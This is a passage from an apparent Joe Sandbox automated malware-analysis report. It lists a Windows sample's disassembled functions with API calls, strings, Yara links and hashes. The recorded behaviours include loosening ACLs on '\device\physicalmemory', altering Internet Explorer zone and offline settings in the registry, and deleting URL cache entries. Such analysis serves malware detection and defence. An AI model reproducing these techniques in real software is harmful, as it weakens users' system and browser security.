                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • BrowseNewProcess, xrefs: 00405113
                            • 1601, xrefs: 004050D4
                            • yes, xrefs: 0040510E
                            • GlobalUserOffline, xrefs: 004050FA
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
